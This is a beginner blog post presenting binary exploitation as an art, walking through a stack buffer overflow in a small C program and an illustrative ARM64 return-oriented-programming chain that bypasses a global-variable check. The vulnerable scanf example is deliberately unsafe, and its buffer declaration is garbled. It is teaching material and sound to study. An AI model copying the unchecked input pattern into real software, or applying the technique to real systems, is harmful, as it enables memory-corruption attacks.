Last year during lockdown I had a bunch of free time and while reading through an exploit trying to make sense of it I realised: the way this exploit works is a form of Art.
But then I started to think about it and realised that it doesn’t even need to be a complex exploit to say this.
Even the most basic buffer/heap overflow exploit is a form of Art.
So I decided to write this little post about it, however at the end I didn’t finish it and left it on my drive.
A few days ago I found it again and decided to finish it up and publish it, so I hope you will enjoy it
Now before I would start this ‘blog post’ or whatever you would like to call it I just want to note that this is my first time doing anything like this.
So if you find any errors please just DM me on twitter(@tomitokics).
THE ART OF EXPLOITATION
If you are a developer who wants to get started in security, or just interested in computers this post is probably for you, as I try my best to show how awesome binary exploitation can be while still keeping it simple.
Now I should mention that by no means I am someone who writes phrack papers, comes up with solutions to the new mitigations etc etc.
However I do have some experience in binary exploitation and I want to cover the basics and tell why binary exploitation is so interesting to me.
For some people Art is found in museums, great classical music or… exploiting bugs.
Exploitation is truly an Art, and if you have ever written an exploit even for the most basic buffer overflow you will realise how true that statement is.
Especially on bigger targets. There are multiple ways of exploiting the same bug.
If you give a bug to two people and the target is large enough they might have a fully different exploit[technique] at the end.
Thats because they see the bug differently, they’d see a completely different way to reach the same bug; they would use different gadgets.
It’s so awesome to look at an exploit code and learn what it does and how it does it(or perhaps writing one on your own).
What was the person thinking, do you see a better, faster way to reach and trigger the bug?
And when you start reversing the binary and start looking into it you will realise that the way exploits crafted is an Art. Carefully thought, sometimes over engineered due to the demand of the high success rate. Doing something the original creator never intended to do. But because they accidentally forgot to check the length of an input from the user they created this monster: the weird machine.
Hopefully, by now some of you can start to see my point(or at least think about how there could be something in it as I actually wrote a whole post about it).
I could go on and on saying its an Art and how awesome it is, but if I don’t show you some examples or the practical side of it, its all just words without the evidence a developer/newcomer would need.
So, let me demonstrate an exploit; a very basic one.
There are no exploits without bugs, so I will introduce you to the most basic bug everyone learns no matter if you are a developer or an exploit developer.
As the name suggest it it is some sort of ‘overrun’.
Buffer overflows can happen on the heap as well as on the stack, however in this particular case as the name suggests, it is on the stack.
Now if you are familiar with C, or C++ this might be easier but don’t worry if you are not I will guide through.
char buf; //Here we allocate a char(acter) buffer with 32 bytes(Note that you don’t actually need to free it/deallocate it as the compiler sets it up for you when compiling your code)
scanf(“%s”,buf); //Here we are waiting for input from the user and copy the input to the buffer ‘buf’ we created earlier.
printf(“You entererd : %s”,buf); //This will print out what was copied to the buffer.
Now can you spot the bug?
If you are a C or C++ developer, or even if you paid close attention to the comments you will probably spot that scanf copies bytes from our controlled input and copies it to a buffer allocated on the stack.
But in this case we have full control over the ‘buf’ buffer.
And since there is no check in the code above, we also control the length of our input.
And thats a problem(Well, in our case its good. No bug == no exploit).
So, what we know so far is that we can control what’s inside the ‘buf’ and most importantly the length of the bytes we wish to copy.
As you can see the buffer is allocated as 32 bytes long.
Now think about what would happen if we enter more that 32 bytes.
You would trigger this bug.
This might not seem like very interesting at first and there isn’t many ways to exploit this however this is just the beginning.
You only triggered the bug, not exploited it which is enough for POC||GTFO, but thats not what we aim for.
BUFFER OVERFLOW EXPLOIT
Alright, so now we know that we can overflow the stack, but now what? where is the ‘Art’ in this?
Slow down, patience is the key. Specially if you want to be an exploit developer.(After-all debugging your exploits is fun, right? :P)
Firstly the question we should ask is what happens when we write too many bytes to the stack(more than 32 in this case) and what is the stack anyways.
The stack: you are probably familiar with the stack, but if not let me introduce you to it very quick.
The stack is a memory region created at runtime. Its purpose is when you create a variable, you can eventually store it on the stack(so basically for local variables). When performing a subroutine call you can push the arguments on the stack for example so that the callee function can use them. Another important use of the stack is when the called function finishes and wants to return to its caller. The way this can be achieved is by the return pointer aka the link register.
Ok, now we all have an idea of what the stack is, what we use it for and what’s on it.
As mentioned, we save arguments and local variables on the stack however more importantly we also save the return pointer(on ARM the link register) on it.
I think you know where I’m going with this..
If we save the return pointer(where we should return after a function call) on the stack but we accidentally or maliciously overwrite it, the callee function can no longer return to the previous caller because well, we overwrote it.
Now if we supply more than 32 bytes we will overwrite both the frame pointer and the return link register.
This becomes a problem when we try to return back to the caller function.
ARM64 assembly functions usually start and end this way:
— Prologue —
SUB SP, SP, 0x20 => allocate space on the stack
STP x29,x30 [SP,#0x10] => save frame pointer and link register on the stack
— Body —
— Epilogue —
LDP x29,x30, [SP,#0x10] => restore register pair(FP & LR) from the stack
ADD SP, SP, #0x20 => readjust the stack
RET => ARM64 instruction for returning, under the hood its a ‘BR LR’(branch to link register) instruction.
Now with a better understanding of control flow you can see that we return to the caller function by restoring the saved link register from the stack and jumping to it.
With no pointer verification(such as PAC) the CPU will happily follow and tries to jump to the value held in the LR even if it’s not the value it is supposed to have in it.
(Obviously if its an invalid pointer such as 0x414141 the program will generate an exception and crashes)
The fun part: ROP
Now with this knowledge we can see what we need to do in order to control the Program Counter register(This is the register which points to somewhere in memory and shows the CPU where it should fetch the instruction from).
If we manage to write more than 32 bytes to the stack we could control the frame pointer but more importantly the link register. With this however a question could arise: what should we overwrite those pointers with in order to continue execution?
Well, in the earlier shellcode days you could’ve just overwritten the LR with the shellcode address on the stack however nowadays you can’t really do that due to the stack not being executable.
Instead we actually just overwrite the pointers with a valid address from the code segment, and we call these gadgets or ROP gadgets.
ROP stands for Return Oriented Programming which if you think about it for a second makes a lot more sense now hence we actually return to the gadgets(with the BR LR instruction).
A sensible question now could be: Why would I want to return to a different function? What’s the point?
Well, we don’t return to any random function. We carefully select these functions based on the instructions found in the body part . With these gadgets we can defeat security mechanisms, checks etc etc. We can quite literally make a whole new ‘program’ from the original if the binary is large enough.
To illustrate it think of something like this:
STR X0, [X1] => Lets say we can control X0, if we can then we control X1 as well(this instruction is *X1_pointer = x0_value)
MOV SP, X1 => Since we control X1 we will control the stack pointer as well
LDP X29,X30, [SP,#0x10] => load the FP and the LR from the stack(This would be from a new ‘fake’ stack since we control now where the stack is. This would be a crucial gadget if we are working with heap bugs, but lets not get into that now)
ADD SP, SP, #0x20 => Adjust the stack
RET => BR LR(Again the link register is under our control so we can specify another gadget address)
As you can see with that gadget we can control X1, and the stack pointer.
To demonstrate how powerful ROP is and how this is a “full blown programming language” let’s try to bypass a check which simply checks the value of a global variable(it will be in data segment which is readable and writable but not executable opposite to the code or the text segment which is readable executable but not writable).
(Lets call this function ‘secret’ since even if we could call it normally it would fail as ‘_check’ is hardcoded to zero)
adrp x8, #___stack_chk_fail_ptr(0x10000c000) => address of page(Locate near the address of the variable)
add x8, x8, #0x50(0x10000c000 += 0x50 0x10000c050) => adjust the offset to the actual variable ‘_check’
ldr w9, [x8] => Load the value of the ‘_check’ to X9(note the ‘w’ which basically means its a 32 bit representation of the X9 register)
cbz w9, _fail => compares x9 with zero, if x9 is zero it will jump to ‘_fail’ which exits the process with the value zero
movz w8, #0x0 => move zero into X8
mov x0, x8 => move x8 into x0( X0 is usually used for first arguments and for the return value on ARM)
bl __exit => call exit(0) which exits the process
If we could load an arbitrary number(such as 1111) into x0, and the address of the global variable ‘_check’ into X1 we could bypass that check with a similar gadget!
There is literally no limit on how many gadgets you can jump to, or better say: how many we can chain together.
Now a gadget that could load the correct values to the desired register will look something like this:
(Call this ‘setup gadget’ as it sets up the registers for future gadgets)
ldp x0, x1, [sp, #0x10] => load whatever value is at the SP+0x10 into x0, and then load whatever value is at the SP+0x18 into x1
ldp x29, x30, [sp, #0x30] => restore FP, LR
add sp, sp, #0x40 => adjust back the SP
ret => BR LR(We can now jump to a similar gadget as shown above, but lets say without the ‘fake stack’ since X1 would hold the address of the ‘_check’)
(We can then call this the ‘write gadget’ due to what it does)
str x0, [x1] => *x1_register = x0_value | store whatever value is in x0(now 1111 since we branched to the ‘setup gadget’ before) to x1(the address of the ‘_check’ variable).
ldp x29,x30, [sp,#0x10] => restore FP & LR from the stack
add sp, sp, #0x20 => adjust back stack pointer
ret => return, using the ‘BR LR’(Can now jump to ‘secret’)
After the write gadget the _check variable should now hold the value ‘1111’ and should look something like this:
And now we can call the original ‘secret’ function and we will pass the check as the variable was changed.
So yes, ROP is programming(hence the ‘P’ stands for programming in ROP). But in a “weird” way (check out liveoverflow’s video about exploring weird machines: video).
You can achieve anything you could do in a high level language such as C if the binary is large enough. You just have to do it manually piecing the code together gadget by gadget.
The example I’ve shown above is just a very simple introduction to ROP, if you decide(which I highly suggest) to dig deeper, write more complex exploits for more complex bugs and eventually systems you will say that indeed: exploitation is a form of Art! And it’s beautiful!
So this is the end of it, if I still didn’t manage to convince you that this is a from of Art, well I’m sorry, I tried my best to keep it simple but at the same time show the beauty of it(perhaps give it another read, you might change your mind?)
This is a little suggestion
if(reader == developer || reader == wants_to_learn_bin_exploitation)
Just start, you might fail a few times but don’t let that discourage you. We all did and we all do.
A great starting point is CTFs or just simply challenges where you need to exploit a binary in a similar way as shown above(i.e with ROP gadgets)
else if(reader == have_some_experince)
If you are already familiar with binary exploitation and feel confident, try exploring bigger targets such as: browsers, kernels.
I myself currently learning about kernel development/exploitation. Spoiler alert: its really FUN!
Sometimes it can be overwhelming but then I always try to look at the big picture to see how it makes sense, and this usually works for me.
Overall I really hope you enjoyed this little blog post, and I hope I’ve introduced you to the Art of exploitation if you were unfamiliar with it.
Feedbacks are always welcome, so don’t hesitate to contact me here or on twitter
Tomi Tokics — @tomitokics